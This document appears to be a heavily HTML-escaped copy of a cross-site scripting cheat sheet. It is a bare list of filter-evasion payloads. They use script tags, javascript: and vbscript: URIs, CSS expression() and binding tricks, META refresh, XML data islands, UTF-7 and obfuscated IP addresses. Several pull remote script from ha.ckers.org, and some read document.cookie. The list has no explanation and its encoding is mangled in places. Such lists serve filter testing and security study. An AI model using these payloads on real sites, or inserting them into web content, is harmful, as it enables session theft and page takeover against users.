&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
